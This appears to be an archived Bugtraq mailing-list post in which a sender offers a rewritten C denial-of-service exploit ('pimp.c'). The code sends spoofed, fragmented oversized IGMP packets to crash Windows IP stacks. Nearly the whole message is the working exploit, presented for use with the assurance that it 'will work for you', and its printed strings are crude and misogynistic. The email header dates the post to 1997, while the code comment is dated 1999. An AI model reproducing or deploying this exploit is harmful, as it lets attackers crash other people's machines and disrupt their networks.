MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Message-ID: <004901bc06b2$8ab081e0$8e42423f@klepto> Date: Mon, 20 Jan 1997 03:15:37 -0600 Reply-To: klepto Sender: Bugtraq List From: klepto Subject: ip stack bug exploit in windows X-To: bugtraq@securityfocus.net To: BUGTRAQ@SECURITYFOCUS.COM I wrote the initial exploit 2-3 months ago, only showing it to friends and associates. Those who were very close to me rewrote it over and over again to make it better, the version that defile wrote kod 1.0 had problems with linux because the kernel would ignore the send becuse of the length of the packet. A friend of mine named nyt helped me out alot with the who and why of kod.c, and wrote a version of his own (original code). For those who are having problems with kod.c working for you.. try this.. i am positive it will work for you. you can find me on irc via EFnet as klepto or klepto@levitate.net de omnibus dubitandum shout outs: cheesebal/traveler/antibyte/winx *lub* /* ** pimp.c 6/4/99 by Rob Mosher: nyt@deadpig.org ** exploits bug in m$'s ip stack ** rewrite by nyt@EFnet ** bug found by klepto ** usage: pimp */ #include #include #include #include #include #include #include #include #include struct igmp { unsigned char igmp_type; unsigned char igmp_code; unsigned short igmp_cksum; struct in_addr igmp_group; }; #define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);} u_long resolve(char *); int main(int argc, char *argv[]) { int nsock, ctr; char *pkt, *data; struct ip *nip; struct igmp *nigmp; struct sockaddr_in s_addr_in; setvbuf(stdout, NULL, _IONBF, 0); printf("pimp.c by nyt\n"); if(argc != 2) ERROR("usage: pimp "); if((nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) ERROR("could not create raw socket"); pkt = malloc(1500); if(!pkt) ERROR("could not allocate memory"); memset(&s_addr_in, 0, sizeof(s_addr_in)); memset(pkt, 0, 1500); nip = (struct ip *) pkt; nigmp = (struct igmp *) (pkt + sizeof(struct ip)); data = (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp)); memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp))); s_addr_in.sin_addr.s_addr = resolve(argv[1]); nip->ip_v = 4; nip->ip_hl = 5; nip->ip_tos = 0; nip->ip_id = 69; nip->ip_ttl = 255; nip->ip_p = IPPROTO_IGMP; nip->ip_sum = 0; nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr; nip->ip_src.s_addr = 2147100000; nigmp->igmp_type = 2; nigmp->igmp_code = 31; nigmp->igmp_cksum = 0; inet_aton("128.1.1.1", &nigmp->igmp_group); printf("pimpin' dem trick-ass-bitches"); for(ctr = 0;ctr < 15;ctr++) { printf("."); nip->ip_len = 1500; nip->ip_off = htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_off = htons(1480/8)|htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_off = htons(5920/8)|htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_len = 831; nip->ip_off = htons(7400/8); sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); usleep(500000); } printf("*slap* *slap* bitch, who yo daddy\n"); shutdown(nsock, 2); close(nsock); } u_long resolve(char *host) { struct hostent *he; u_long ret; if(!(he = gethostbyname(host))) { herror("gethostbyname()"); exit(-1); } memcpy(&ret, he->h_addr, sizeof(he->h_addr)); return ret; }